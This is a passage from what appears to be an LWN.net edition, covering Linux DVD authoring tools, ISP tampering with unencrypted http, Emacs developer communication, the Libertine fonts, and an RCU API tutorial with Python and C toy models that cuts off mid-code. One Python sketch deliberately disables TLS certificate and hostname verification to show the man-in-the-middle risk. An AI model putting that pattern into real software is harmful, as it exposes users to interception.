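"clip.mpg" and "dvd_out" are invented for the example, and neither
application is claimed to generate exactly this output.

```python
import xml.etree.ElementTree as ET


def build_dvdauthor_xml(video_files, dest="dvd_out"):
    """Return dvdauthor-style XML for one titleset with one title per file.

    Hypothetical helper: 'dest' and the file names are illustrative only.
    """
    root = ET.Element("dvdauthor", dest=dest)
    ET.SubElement(root, "vmgm")               # empty top-level menu set
    titleset = ET.SubElement(root, "titleset")
    titles = ET.SubElement(titleset, "titles")
    for path in video_files:
        pgc = ET.SubElement(titles, "pgc")    # one program chain per title
        ET.SubElement(pgc, "vob", file=path)  # the MPEG-2 stream to include
    return ET.tostring(root, encoding="unicode")


xml_text = build_dvdauthor_xml(["clip.mpg"])
print(xml_text)
```

A file like this would typically be handed to dvdauthor (for instance via
its -x option); the menus, buttons, and actions that the graphical tools
add are what make the real command lines so much more complex.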


A feature which is lacking from both tools is a "hold my hand" mode for
people who are not - and do not want to be - experts in DVD creation.  A
sequence of screens which would set up an initial menu, import titles, and
create buttons for each would be most helpful in this regard.  As it is,
users must have their own internal checklist in mind when creating DVDs,
and it is easy to miss things.  Your editor, while certainly slower than
most, is unlikely to be the only one to have created an impressive pile of
coasters before finally producing a DVD which actually worked as intended.


While the tools reviewed here are, in your editor's opinion, the best
available for Linux for this task, there are some others to be aware of:


 Tovid
     is a set of command-line tools for the creation of DVD menus and
     putting the whole structure together.  They hide much of the
     underlying complexity and may prove useful for users not wanting to
     work with a graphical interface.

 VideoLink
     is an interesting tool which enables the creation of DVD menus in
     HTML.  It then renders them with a web browser and prepares the result
     for burning to a DVD.

 Kino (which will be covered in
     depth in part 2) can produce a simple dvdauthor script to make a
     no-menu DVD with a single title.

 KDE
    DVD Authoring Wizard is a kdialog script which steps the user
    through the creation of a simple DVD.  It provides the handholding
    mentioned above, but, arguably, simplifies out too much of the
    process. 


Of all these tools, it must be said that qdvdauthor is, at this time, the
most complete and capable.  It provides access to almost any capability
supported by current DVD players, is relatively easy to use, and works most
of the time.  With luck, the developers (who released the 1.0.0 version
reviewed here in November, 2007) will devote themselves to smoothing out
the remaining rough edges, leaving us with a tool which DVD authors at any
level can use.

		The future of unencrypted web traffic


Hypertext transfer protocol (http) is the heart of the web, providing the
means to retrieve content from remote servers.  It is an unencrypted,
text-based protocol which allows malicious intermediaries to snoop on and
potentially modify the traffic.  Unfortunately, internet service providers
(ISPs) are getting increasingly bold in manipulating the traffic that they
carry.  This has led some to call for the elimination of http, in favor of
encrypted http (aka secure http or https).


An ISP is perfectly situated to gather an enormous amount of information
about its users, their website preferences and habits (often called
clickstream data).  Some have reportedly
been selling some of that data in a thinly-anonymized form to
advertisers and others.  As AOL's well-intentioned, but poorly implemented,
release of
search queries showed, it is rather easy to analyze this kind of
data and pierce the anonymity, deriving the specific user. 


Another recent ISP trick is to modify a retrieved web page to display other
information – under the control of the ISP – which looks like
it comes from the website itself.  Canadian ISP Rogers Internet has been testing a system to add
content to the Google homepage for their customers who are near their
monthly bandwidth limits.  There are also plans afoot for ISPs to use
clickstream data to target advertising – though just where those
ads would show up is far from clear.


This kind of manipulation is unlikely to be what internet users expect
– to the extent they think about it at all.  The model folks tend to use
is that of a phone company; we do not expect them to sell our call records
to the highest bidder, nor do we give them license to modify our calls.
Various telecommunications privacy laws protect that data, but those laws
have not (yet) been applied to internet traffic.  In addition, ISPs tend to
have a monopoly or near-monopoly, which restricts alternative,
less-intrusive ISPs from competing. 


Fortunately, there are technical solutions possible in the internet realm
that would be difficult or impossible to implement network-wide in the
phone system.  Encrypting website traffic will go a long way towards
eliminating this kind of ISP abuse, though it is no panacea.  As more of
these kinds of privacy invasions occur, we should see more routine use of
https by websites.


Currently, https is almost exclusively used for e-commerce transactions:
typing in credit card numbers and the like.  Authentication via username
and password is another area that sees widespread encrypted pages.  Sites
may start to use https for their entire site to combat clickstream and page
rewriting abuse – though there will still be some information leakage
as the ISPs can still see what sites are being visited.


In order to make an https connection, the server must have a certificate
with its public key.  Typically those are signed by an authority recognized
by browsers, which allows the browser to authenticate that the certificate
belongs to the host visited.  Getting signed certificates is a bit
cumbersome, costs some money, and they need to be renewed periodically
– all of which adds up to a headache for a site, especially a small,
non-commercial site, that wants to switch
to using https.  Self-signed certificates are an alternative, but because
they are susceptible to man-in-the-middle attacks, browsers warn their
users when they receive one. 
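
The client side of that check can be sketched with the ssl module from
Python's standard library; this is an illustration of the general idea, not
a description of how any particular browser works.  The variable names
"strict" and "lenient" are invented for the example, and no network
connection is made.

```python
import ssl

# Default client context: the server certificate must chain to a trusted
# authority and must match the host name being visited.
strict = ssl.create_default_context()
print(strict.verify_mode == ssl.CERT_REQUIRED)  # certificate is mandatory
print(strict.check_hostname)                    # host name is checked

# Accepting a self-signed certificate without question means switching
# those checks off, which is what leaves room for a man in the middle.
lenient = ssl.create_default_context()
lenient.check_hostname = False        # must be cleared before verify_mode
lenient.verify_mode = ssl.CERT_NONE
```

A connection made with the strict context fails its handshake when
presented with a certificate it cannot verify; the lenient context encrypts
the traffic but gives no assurance about who is on the other end.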


Another problem with this approach is the extra processing required on the
server to support encrypting each and every request.  There is a
non-trivial amount of extra work that must be done per request and cannot
be cached.  Sites that wish to avoid the problems that some ISPs are 
introducing will just have to bear that cost.


Pushing bits is not very glamorous, but that is really what one hires an
ISP to do.  Since they seem to be finding new and exciting ways to
interfere with those bits – Comcast
messing with BitTorrent traffic 
for example – internet users will have to find ways to thwart their
schemes and encryption will be a big part of that effort.  Using https
site-wide is only one step; other services will also need to be protected
from ISP abuse.  What if an ISP started manipulating the results returned
from DNS queries, perhaps routing some to a server they control?


		Development issues part 1: Project communication


 Free software projects, like all projects, live and die by their
communications; developers must be able to talk to each other easily so
that a consistent, coherent result emerges.  But developers have differing
ideas about what methods to use.  A discussion on the Emacs development
list provides a nice contrast between two of the main communications
methods used by projects today.  

Traditionally, developer communications have been handled
by the venerable mailing list, but that is changing, at least for some
projects.  Internet relay chat (IRC) has become the tool of choice
for newer projects, which may leave those who are not inclined towards
realtime communication out of the loop.  Development methodologies are
evolving, and some are adopting the new ways more quickly than
others – some may never adopt them at all.


The difference between communicating in IRC or via a mailing list is in
some ways like the difference between text messaging and email.  Email has
its advantages, in that the recipient chooses the time to read and respond
to the message, but it is often seen as slow.  Text messaging or IRC have the
advantage of speed; people receive a message and generally respond
immediately.  But that speed comes at a cost – interrupting the
recipient.  It also requires a full-time internet connection.

 While email archives are somewhat cumbersome to use, they are usable.
IRC logs are exceedingly painful as they are not subject-based; they just
cover a specific time span of all conversation on the channel.  Email
conversations may play out over days or weeks, but they are generally
easier to follow compared to the multiple interleaved conversations that
occur on IRC channels.  It is in the nature of the medium: IRC
conversations are meant to be used immediately, not reread weeks later.


It is, in some ways, a culture clash.  Younger developers tend to be more
inclined towards realtime communications, while older hackers tend to be more
comfortable with mailing lists.  In what would seem to be an uphill battle,
Eric S. Raymond has been advocating a more "modern"
development style for GNU Emacs.  His messages, appearing on Emacs-devel,
champion a development style that includes IRC communication, a bug
tracking system, and a version control system (VCS) more advanced than CVS.


Raymond's experiences working with the Battle for Wesnoth development team exposed him to
some of the newer techniques used in project communication, particularly
IRC.  He reached a somewhat surprising conclusion about IRC: 

And far from finding I can't keep up, I've discovered that I like the
stimulation.  I grok how the kids feel about this, because
mailing-list-only
projects have started to seem slow and boring to me, too.


The Wesnoth project uses IRC for all day-to-day design and development
decisions, leaving the mailing list for more complicated discussions and
white papers.  This has the effect of excluding interested developers who
are not able or willing to monitor an IRC channel throughout their day, but
that is unlikely to be the intent.  The reverse is also true: the perceived
slow pace of mailing-list-only projects has the effect of excluding those
with a strong preference for a faster style of development.  As Raymond
shows, though, there is hope that members of one school can retrain –
if they wish – for the other.

 While decision making by IRC does not seem to be in the cards any time
soon for Emacs, an upgrade to something other than CVS seems to have gained
more traction.  Richard Stallman has been asking a lot of questions about
git while other developers discuss other distributed version control
systems (DVCS), like darcs, monotone, arch, and Mercurial.  Raymond is
working on a survey of the VCS landscape that, once completed, 
he and others hope will guide the project into a better VCS choice.

One of the main DVCS features that seems of interest to Stallman is the
"offline" capabilities.  Having the entire history of a project and being
able to do commits of work in progress while being disconnected from the
internet are features that CVS does not have.  Stallman is
adamant that the tools used to develop Emacs be usable by those who are not
always connected to the net, which makes a DVCS rather attractive.


The Emacs project is one of the oldest free software projects in existence;
it is, like its founder, fairly resistant to change.  While Emacs itself is
used by hackers everywhere, it is increasingly falling behind its
competitors, at least partially because of the slow pace at which it is developed.
Raymond's belief is that by upgrading the tools used to take advantage of
advances made since CVS and mailman were new, the time between Emacs
releases could be reduced to something more sane.   Doing that could go a
long way towards making Emacs more relevant to younger hackers:

When
those Eclipse fans pointed and laughed because we're still stuck on
CVS and don't have a bug tracker, what counter could I have had?  They
know these are bad choices and they know that I know it -- so when
they write off Emacs as old, tired, and irrelevant to anything they're
interested in, I find it increasingly difficult to reply.


It is unlikely that just some tool changes will be enough to resurrect the
flagging popularity of Emacs, but there are hopeful signs.  Some of
Raymond's suggestions met a warmer reception than one might have expected.
It is clear that a fair number of Emacs fans and developers are frustrated
with the current state of affairs.  It may be that "just some tool changes"
are enough to reinvigorate the project to a point where it attracts more
developers and users.  That can only be a good thing for Emacs.


		The Linux Libertine Open Fonts Project


The Libertine Open Fonts Project, which first showed up on LWN in May, 2006,
is an open source font project.
The project's leader is Philipp H. Poll.
The Libertine project description states:


Letters and fonts have two charakteristics: On the one hand they are basic elements of communication and fundament of our culture, on the other hand they are cultural goods and artcraft.
You are able to see just the first aspect, but when it comes to software youll see copyrights and patents even on the most elementary fonts. Therefore we want to give you a free alternative: This is why we founded the Libertine Open Fonts Project.


The Libertine license information states:


Our fonts are free in the sense of the GPL and OFL. In a nutshell: Changing the font is allowed as long as the derivative work is published under the same license again. Pedantics keep claiming that the embedded use of GPL-fonts in i.e. PDFs requires the free publication of the PDF as well. This, of course, is absolute nonsense, because - to our opinion - the font is not significantly changed by the embedding. To abolish the conflict some members of the FSF have written an addition to the license: the so called Font Exception. Our fonts GPL contains this font exception (since version 2.7). Since version 2.1.9 LinuxLibertine is also licensed under the OFL, which will clarify usability-conflicts.


The Libertine font files are available as both TTF (TrueType) and
OTF (OpenType) fonts.  The Linux-compatible
LaTeX typesetting system
supports the Libertine fonts.  See the Libertine
LaTeX document [PDF] for usage and installation instructions.

Libertine includes a wide variety of
font styles.  Numerous languages are supported, and many special
characters are available.
For a look at some of the LaTeX-accessible font characters, see the
glyph list document [PDF].


Version 2.7.9 of the Libertine font project was recently
announced.
This release adds hinting, which allows the fonts to be used with
Microsoft Word.  Other changes include improved kern pairs for better
typography, some minor tweaks and some bug fixes.


The Libertine fonts are available for download
here.  The fonts come in a standard .tgz file which includes
all of the font collections as both .ttf and .otf files.
The Fontforge source
files are also available.  Fontforge is an open-source outline font editor.


		RCU part 3: the RCU API


[Editor's note: this is the third and final installment in Paul
McKenney's "What is RCU?" series.  The first and second parts remain available
for those who might have missed them.  Many thanks to Paul for letting LWN
run these articles.]

Introduction
Read-copy update (RCU) is a synchronization mechanism that was added to
the Linux kernel in October of 2002.
RCU is most frequently described as a replacement for reader-writer locking,
but has also been used in a number of other ways.
RCU is notable in that RCU readers do not directly synchronize with
RCU updaters,
which makes RCU read paths extremely fast, and also
permits RCU readers to accomplish useful work even
when running concurrently with RCU updaters.

This leads to the question "what exactly is RCU?", a question that this
document addresses from the viewpoint of the Linux kernel's RCU API.


	RCU has a Family of Wait-to-Finish APIs

 
	RCU has Publish-Subscribe and Version-Maintenance APIs

 
	So, What is RCU Really?

These sections are followed by a
references section and the
answers to the Quick Quizzes.


RCU has a Family of Wait-to-Finish APIs
The most straightforward answer to "what is RCU" is that RCU is
an API used in the Linux kernel, as summarized by the pair of tables
in this section
(the first table shows the wait-for-RCU-readers portions of the API,
while the second table shows the publish/subscribe portions of the API).
Or, more precisely, RCU is a family of APIs as shown in the first table,
with each column corresponding to a member of the RCU API family.

If you are new to RCU, you might consider focusing on just one
of the columns in the following table.
For example, if you are primarily interested in understanding how RCU
is used in the Linux kernel, "RCU Classic" would be the place to start,
as it is used most frequently.
On the other hand, if you want to understand RCU for its own sake,
"SRCU" has the simplest API.
You can always come back for the other columns later.

If you are already familiar with RCU, the following pair of tables can
serve as a useful reference.


Quick Quiz 1:
Why are some of the cells in the above table colored green?

The "RCU Classic" column corresponds to the original RCU implementation,
in which RCU read-side critical sections are delimited by
rcu_read_lock() and rcu_read_unlock(), which
may be nested.
The corresponding synchronous update-side primitives,
synchronize_rcu(), along with its synonym
synchronize_net(), wait for any currently executing
RCU read-side critical sections to complete.
The length of this wait is known as a "grace period".
The asynchronous update-side primitive, call_rcu(),
invokes a specified function with a specified argument after a
subsequent grace period.
For example, call_rcu(p,f); will result in
the "RCU callback" f(p)
being invoked after a subsequent grace period.
There are situations,
such as when unloading a module that uses call_rcu(),
when it is necessary to wait for all
outstanding RCU callbacks to complete.
The rcu_barrier() primitive does this job.
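
The relationship between nested read-side critical sections, grace periods,
and call_rcu() callbacks can be sketched with a small single-threaded toy
model in Python.  This is not kernel code and makes no attempt to mirror the
real implementation: the ToyRCU class, its explicit reader names, and its
bookkeeping are all assumptions made for illustration, and, unlike the
kernel's call_rcu(), this toy invokes a callback immediately when no reader
is active.

```python
class ToyRCU:
    """Single-threaded toy model of RCU Classic grace periods (not kernel code)."""

    def __init__(self):
        self._depth = {}      # reader name -> nesting depth of its critical section
        self._callbacks = []  # [readers still blocking the grace period, func, arg]

    def rcu_read_lock(self, reader):
        self._depth[reader] = self._depth.get(reader, 0) + 1

    def rcu_read_unlock(self, reader):
        self._depth[reader] -= 1
        if self._depth[reader] == 0:
            # Outermost unlock: this reader no longer blocks any grace period.
            del self._depth[reader]
            for blockers, _, _ in self._callbacks:
                blockers.discard(reader)
            self._invoke_ready()

    def call_rcu(self, arg, func):
        # Only readers already inside a critical section can delay the callback.
        self._callbacks.append([set(self._depth), func, arg])
        self._invoke_ready()

    def _invoke_ready(self):
        ready = [cb for cb in self._callbacks if not cb[0]]
        self._callbacks = [cb for cb in self._callbacks if cb[0]]
        for _, func, arg in ready:
            func(arg)


rcu = ToyRCU()
freed = []
rcu.rcu_read_lock("A")
rcu.rcu_read_lock("A")             # nested critical section
rcu.call_rcu("old", freed.append)  # like call_rcu(p, f): f(p) runs later
rcu.rcu_read_lock("B")             # began after call_rcu(): does not delay it
rcu.rcu_read_unlock("A")
print(freed)                       # still empty: A's outer section is open
rcu.rcu_read_unlock("A")
print(freed)                       # callback has now been invoked
```

The point to notice is that reader "B", which entered its critical section
after the callback was posted, does not hold up the grace period; only
pre-existing readers do.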

In the "RCU BH" column, rcu_read_lock_bh() and
rcu_read_unlock_bh() delimit RCU read-side critical
sections, and call_rcu_bh() invokes the specified
function and argument after a subsequent grace period.
Note that RCU BH does not have a synchronous synchronize_rcu_bh()
interface,
though one could easily be added if required.

Quick Quiz 2:
What happens if you mix and match?
For example, suppose you use rcu_read_lock() and
rcu_read_unlock() to delimit RCU read-side critical
sections, but then use call_rcu_bh() to post an
RCU callback?

In the "RCU Sched" column, anything that disables preemption
acts as an RCU read-side critical section, and synchronize_sched()
waits for the corresponding RCU grace period.
This RCU API family was added in the 2.6.12 kernel, which split the
old synchronize_kernel() API into the current
synchronize_rcu() (for RCU Classic) and
synchronize_sched() (for RCU Sched).
Note that RCU Sched does not have an asynchronous
call_rcu_sched() interface,
though one could be added if required.

Quick Quiz 3:
What happens if you mix and match RCU Classic and RCU Sched?

The "Realtime RCU" column has the same API as does
RCU Classic, the only difference being that RCU read-side critical
sections may be preempted and may block while acquiring spinlocks.
The design of Realtime RCU is described in the LWN article
The design of preemptible read-copy-update.

Quick Quiz 4:
What happens if you mix and match Realtime RCU and RCU Classic?

The "SRCU" column displays a specialized RCU API that permits
general sleeping in RCU read-side critical sections, as was
described in the LWN article
Sleepable RCU.
Of course,
use of synchronize_srcu() in an SRCU read-side
critical section can result in
self-deadlock, so should be avoided.
SRCU differs from earlier RCU implementations in that the caller
allocates an srcu_struct for each distinct SRCU
usage.
This approach prevents SRCU read-side critical sections from blocking
unrelated synchronize_srcu() invocations.
In addition, in this variant of RCU, srcu_read_lock()
returns a value that must be passed into the corresponding
srcu_read_unlock().
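
The two distinguishing features of the SRCU API, a separate srcu_struct per
usage and a value carried from srcu_read_lock() to srcu_read_unlock(), can
be illustrated with another Python toy.  The counter-pair design below is an
assumption chosen for simplicity rather than a description of the kernel's
algorithm, and start_grace_period() and readers_remaining() are hypothetical
helpers standing in for the waiting that synchronize_srcu() would do.

```python
class ToySRCU:
    """Toy stand-in for one srcu_struct: two reader counters and an index."""

    def __init__(self):
        self._count = [0, 0]  # active readers per index
        self._idx = 0         # index handed to new readers

    def srcu_read_lock(self):
        idx = self._idx
        self._count[idx] += 1
        return idx            # caller must hand this back on unlock

    def srcu_read_unlock(self, idx):
        self._count[idx] -= 1

    def start_grace_period(self):
        """Flip the index; return the old one, whose readers must drain."""
        old = self._idx
        self._idx ^= 1
        return old

    def readers_remaining(self, idx):
        return self._count[idx]


net_srcu, fs_srcu = ToySRCU(), ToySRCU()  # two unrelated SRCU usages
token = net_srcu.srcu_read_lock()          # a reader that may sleep
old = net_srcu.start_grace_period()
late = net_srcu.srcu_read_lock()           # arrives after the flip
print(net_srcu.readers_remaining(old))     # pre-existing reader still counted
print(fs_srcu.readers_remaining(fs_srcu.start_grace_period()))  # unaffected
net_srcu.srcu_read_unlock(token)
print(net_srcu.readers_remaining(old))     # grace period may now end
net_srcu.srcu_read_unlock(late)
```

Because each usage has its own structure, the sleeping reader in net_srcu
has no effect on a grace period started on fs_srcu.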

The "QRCU" column presents an RCU implementation with the same
API structure as SRCU, but optimized for extremely low-latency
grace periods in the absence of readers, as described in the LWN article
Using Promela and Spin to verify parallel algorithms.
As with SRCU, use of synchronize_qrcu() in a QRCU read-side critical
section can result in self-deadlock, so should be avoided.
Although QRCU has not yet been accepted into the Linux kernel, it
is worth mentioning given that it is the only RCU implementation
that can boast deep sub-microsecond grace-period latencies.

Quick Quiz 5:
Why do both SRCU and QRCU lack asynchronous call_srcu()
or call_qrcu() interfaces?

Quick Quiz 6:
Under what conditions can synchronize_srcu() be safely
used within an SRCU read-side critical section?

The Linux kernel currently has a surprising number of RCU APIs and
implementations.
There is some hope of reducing this number, evidenced by the fact
that a given build of the Linux kernel currently has at most
three implementations behind four APIs (given that RCU Classic
and Realtime RCU share the same API).
However, careful inspection and analysis will be required, just as
would be required for one of the many locking APIs.


RCU has Publish-Subscribe and Version-Maintenance APIs
Fortunately, the RCU publish-subscribe and version-maintenance
primitives shown in the following
table apply to all of the variants of RCU discussed above.
This commonality can in some cases allow more code to be shared,
which certainly reduces the API proliferation that would otherwise
occur.


The first pair of categories operate on Linux
struct list_head lists, which are circular, doubly-linked
lists.
The list_for_each_entry_rcu() primitive traverses an
RCU-protected list in a type-safe manner, while also enforcing
memory ordering for situations where a new list element is inserted
into the list concurrently with traversal.
On non-Alpha platforms, this primitive incurs little or no performance
penalty compared to list_for_each_entry().
The list_add_rcu(), list_add_tail_rcu(),
and list_replace_rcu() primitives are analogous to
their non-RCU counterparts, but incur the overhead of an additional
memory barrier on weakly-ordered machines.
The list_del_rcu() primitive is also analogous to its
non-RCU counterpart, but oddly enough is very slightly faster due to the
fact that it poisons only the prev pointer rather than
both the prev and next pointers as
list_del() must do.
Finally, the list_splice_init_rcu() primitive is similar
to its non-RCU counterpart, but incurs a full grace-period latency.
The purpose of this grace period is to allow RCU readers to finish
their traversal of the source list before completely disconnecting
it from the list header -- failure to do this could prevent such
readers from ever terminating their traversal.

Quick Quiz 7:
Why doesn't list_del_rcu() poison both the next
and prev pointers?

The second pair of categories operate on Linux's
struct hlist_head, which is a linear linked list.
One advantage of struct hlist_head over
struct list_head is that the former requires only
a single-pointer list header, which can save significant memory in
large hash tables.
The struct hlist_head primitives in the table
relate to their non-RCU counterparts in much the same way as do the
struct list_head primitives.
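
The memory savings are easy to estimate.  The following Python sketch
assumes that struct list_head holds two pointers (next and prev) and struct
hlist_head holds one (first); the bucket count is a made-up figure, and
header_bytes_saved() is a hypothetical helper.

```python
import struct

POINTER_SIZE = struct.calcsize("P")   # bytes per pointer on this machine
LIST_HEAD_SIZE = 2 * POINTER_SIZE     # struct list_head: next and prev
HLIST_HEAD_SIZE = 1 * POINTER_SIZE    # struct hlist_head: first only


def header_bytes_saved(buckets):
    """Bytes saved by using hlist_head rather than list_head bucket headers."""
    return buckets * (LIST_HEAD_SIZE - HLIST_HEAD_SIZE)


buckets = 1 << 20  # hypothetical hash table with about a million buckets
print(header_bytes_saved(buckets))
```

On a machine with 8-byte pointers, a table of that size saves 8MB in bucket
headers alone.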

The final pair of categories operate directly on pointers, and
are useful for creating RCU-protected non-list data structures,
such as RCU-protected arrays and trees.
The rcu_assign_pointer() primitive ensures that any
prior initialization remains ordered before the assignment to the
pointer on weakly ordered machines.
Similarly, the rcu_dereference() primitive ensures that subsequent
code dereferencing the pointer will see the effects of initialization code
prior to the corresponding rcu_assign_pointer() on
Alpha CPUs.
On non-Alpha CPUs, rcu_dereference() documents which pointer
dereferences are protected by RCU.
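
The shape of the publish-subscribe pattern can be shown in a few lines of
Python, with the caveat that Python exposes no memory barriers, so the
ordering that rcu_assign_pointer() and rcu_dereference() exist to enforce is
simply assumed here.  The Config class, the global pointer gp, and the
publish() and reader_sum() helpers are all invented for this sketch.

```python
class Config:
    """An RCU-protected structure in this toy: never modified once published."""

    def __init__(self, a, b):
        self.a = a
        self.b = b


gp = None  # the RCU-protected pointer (hypothetical name)


def publish(a, b):
    """Updater: finish initialization first, then publish with one assignment."""
    global gp
    new = Config(a, b)   # initialization happens before publication
    gp = new             # stands in for rcu_assign_pointer(gp, new)


def reader_sum():
    """Reader: fetch the pointer once, then use only that snapshot."""
    p = gp               # stands in for p = rcu_dereference(gp)
    return None if p is None else p.a + p.b


publish(1, 2)
snapshot = gp            # a reader that fetched the pointer before the update
publish(10, 20)          # the updater publishes a new version
print(snapshot.a + snapshot.b)   # the old version is still intact
print(reader_sum())              # new readers see the new version
```

The old version stays valid for the reader that already holds it, which is
the version-maintenance half of the API; deciding when that old version may
be freed is the job of the wait-to-finish primitives described earlier.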

Quick Quiz 8:
Normally, any pointer subject to rcu_dereference() should
always be updated using rcu_assign_pointer().
What is an exception to this rule?

Quick Quiz 9:
Are there any downsides to the fact that these traversal and update
primitives can be used with any of the RCU API family members?


So, What is RCU Really?
At its core, RCU is nothing more nor less than an API that supports
publication and subscription for insertions, waiting for all RCU readers
to complete, and maintenance of multiple versions.
That said, it is possible to build higher-level constructs
on top of RCU, including the reader-writer-locking, reference-counting,
and existence-guarantee constructs listed in the companion article.
Furthermore, I have no doubt that the Linux community will continue to
find interesting new uses for RCU,
just as they do for any of a number of synchronization
primitives throughout the kernel.

Finally, a complete view of RCU would also include
all of the things you can do with these APIs.

Acknowledgements
We are all indebted to Andy Whitcroft, Jon Walpole, and Gautham Shenoy,
whose review of an early draft of this document greatly improved it.
I owe thanks to the members of the Relativistic Programming project
and to members of PNW TEC for many valuable discussions.
I am grateful to Dan Frye for his support of this effort.

This work represents the view of the author and does not necessarily
represent the view of IBM.

Linux is a registered trademark of Linus Torvalds.

Other company, product, and service names may be trademarks or
service marks of others.


References
This section gives a short annotated bibliography covering the use of RCU,
Linux-kernel RCU implementations, background, and historical perspectives.
For more information, see

Paul E. McKenney's RCU Page.


Using RCU

 
	Overview of Linux-Kernel Reference Counting (McKenney,
	January 2007) [PDF].
	Overview of Linux-kernel reference counting (including RCU)
	prepared for the
	Concurrency Working Group of the C/C++ standards committee.

 
	RCU and Unloadable Modules (McKenney, January 2007).
	Describes how to unload modules that use call_rcu(),
	so as to avoid RCU callbacks trying to use the module after it
	has been unloaded.

 
	Recent Developments in SELinux Kernel Performance.
	James Morris describes a performance problem in the SELinux
	Access Vector Cache (AVC), and its resolution via RCU in
	a patch by Kaigai Kohei.

 
	Using Read-Copy-Update Techniques for System V IPC in the
	Linux 2.5 Kernel (Arcangeli et al., June 2003) [PDF].
	Describes how RCU is used in the Linux kernel's System V IPC
	implementation.

Linux-Kernel RCU Implementations

 
	The design of preemptible read-copy-update (McKenney, October 2007).
	Describes a high-performance RCU implementation for realtime use.

 
	Sleepable RCU (McKenney, October 2006).
	Description of SRCU.

 
	Using Promela and Spin to verify parallel algorithms (McKenney,
	August 2007).
	Description of the QRCU patch.

 
	RCU dissertation (McKenney, July 2004) [PDF].
	
	Section 2.2.20 (pages 62-64) gives a history of RCU-like
		mechanisms, a very brief summary of which can be found
		below.
		Chapter 4 (pages 71-98) and Appendix C (pages 326-345) review
		a number of different types of RCU implementations, summarizing
		a number of earlier papers.
		Chapter 5 (pages 137-178) gives an overview of a number of
		"design patterns" guiding use of RCU.
		Chapter 6 (pages 179-234) describes some early uses of RCU.
	

	Using RCU in the Linux 2.5 Kernel (October 2003).
	Brief summary of why RCU can be helpful, along with
	an analogy between RCU and reader-writer locking.

	Anyone who is laboring under the misapprehension that
	the Linux community would never have
	independently invented RCU should read this
	netdev posting and this one as well.
	Both postings pre-date the earliest known introduction of RCU to the
	Linux community.

Background

 
	Real-Time Linux Wiki.
	Provides much valuable information on the -rt patchset for both
	kernel and application developers.

 
	Home of the -rt kernel patchsets.

 
	Memory Ordering in Modern Microprocessors (McKenney, August 2005) [PDF].
	Gives an overview of how Linux's memory-ordering primitives work
	on a number of computer architectures.

Historical Perspectives on RCU and Related Mechanisms

 
	Tornado: Maximizing Locality and Concurrency in a
	Shared Memory Multiprocessor Operating System
	(Gamsa et al., February 1999) [PDF].
	Independent invention of a mechanism very similar to RCU.
	Tornado is a research operating system developed at the
	University of Toronto.
	This operating system uses its analog to RCU pervasively.
	Some of the University of Toronto students brought this operating
	system with them to IBM Research, where it was developed as part of the
	K42 project.

 
	Read-Copy Update: Using Execution History to Solve Concurrency
	Problems (McKenney and Slingwine, October 1998) [PDF].
	First non-patent publication of DYNIX/ptx's RCU implementation.

 
	Passive Serialization in a Multitasking Environment
	(Hennessey et al., February 1989).
	This patent describes an RCU-like mechanism that was apparently
	used in IBM's VM/XA mainframe hypervisor.
	This is the earliest known production use of an RCU-like mechanism.

 
	Concurrent Manipulation of Binary Search Trees (Kung and Lehman,
	September 1980).
	The earliest known publication of an RCU-like mechanism,
	using a garbage collector to implicitly compute grace periods.


Answers to Quick Quizzes
Quick Quiz 1:
Why are some of the cells in the above table colored green?

Answer: The green API members (rcu_read_lock(),
rcu_read_unlock(), and call_rcu()) were the
only members of the Linux RCU API that Paul E. McKenney was aware of back
in the mid-90s.
During this timeframe, he was under the mistaken impression that
he knew all that there is to know about RCU.

Back to Quick Quiz 1.
Quick Quiz 2:
What happens if you mix and match?
For example, suppose you use rcu_read_lock() and
rcu_read_unlock() to delimit RCU read-side critical
sections, but then use call_rcu_bh() to post an
RCU callback?

Answer: If there happened to be no RCU read-side critical
sections delimited by rcu_read_lock_bh() and
rcu_read_unlock_bh() at the time call_rcu_bh()
was invoked, RCU would be within its rights to invoke the callback
immediately, possibly freeing a data structure still being used by
the RCU read-side critical section!
This is not merely a theoretical possibility: a long-running RCU
read-side critical section delimited by rcu_read_lock()
and rcu_read_unlock() is vulnerable to this failure mode.

This vulnerability disappears in -rt kernels, where
RCU Classic and RCU BH both map onto a common implementation.

Back to Quick Quiz 2.
Quick Quiz 3:
What happens if you mix and match RCU Classic and RCU Sched?

Answer: In a non-PREEMPT or a PREEMPT kernel, mixing these
two works "by accident" because in those kernel builds, RCU Classic and RCU
Sched map to the same implementation.
However, this mixture is fatal in PREEMPT_RT builds using the -rt
patchset, due to the fact that Realtime RCU's read-side critical
sections can be preempted, which would permit
synchronize_sched() to return before the
RCU read-side critical section reached its rcu_read_unlock()
call.
This could in turn result in a data structure being freed before the
read-side critical section was finished with it,
which could in turn greatly increase the actuarial risk experienced
by your kernel.

In fact, the split between RCU Classic and RCU Sched was inspired
by the need for preemptible RCU read-side critical sections.

Back to Quick Quiz 3.
Quick Quiz 4:
What happens if you mix and match Realtime RCU and RCU Classic?

Answer: That would be up to you, because you would have
to code up changes to the kernel to make such mixing possible.
Currently, any kernel running with RCU Classic cannot access
Realtime RCU and vice versa.

Back to Quick Quiz 4.
Quick Quiz 5:
Why do both SRCU and QRCU lack asynchronous call_srcu()
or call_qrcu() interfaces?

Answer: Given an asynchronous interface, a single task
could register an arbitrarily large number of SRCU or QRCU callbacks,
thereby consuming an arbitrarily large quantity of memory.
In contrast, given the current synchronous
synchronize_srcu() and synchronize_qrcu()
interfaces, a given task must finish waiting for a given grace period
before it can start waiting for the next one.

Back to Quick Quiz 5.
Quick Quiz 6:
Under what conditions can synchronize_srcu() be safely
used within an SRCU read-side critical section?

Answer: In principle, you can use
synchronize_srcu() with a given srcu_struct
within an SRCU read-side critical section that uses some other
srcu_struct.
In practice, however, doing this is almost certainly a bad idea.
In particular, the following could still result in deadlock:
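
One way such a deadlock can arise is sketched here as a small userspace
model rather than as real kernel code.  The names ssa and ssb, the
srcu_model structure, and the model_* helpers are all assumptions made
for illustration; the comment shows the kernel-style calls that each task
is imagined to make.

```c
#include <stdbool.h>

/* Toy model (an assumption for illustration): one reader count per SRCU domain. */
struct srcu_model {
	int readers;
};

/* Stand-in for srcu_read_lock(): enter a read-side critical section. */
int model_srcu_read_lock(struct srcu_model *sp)
{
	sp->readers++;
	return 0;	/* the real primitive returns an index for the unlock */
}

/* Stand-in for srcu_read_unlock(): leave the read-side critical section. */
void model_srcu_read_unlock(struct srcu_model *sp, int idx)
{
	(void)idx;
	sp->readers--;
}

/*
 * A real synchronize_srcu() blocks until pre-existing readers of the
 * given domain have finished.  The model only reports whether it would
 * have to block.
 */
bool model_sync_would_block(const struct srcu_model *sp)
{
	return sp->readers > 0;
}

/*
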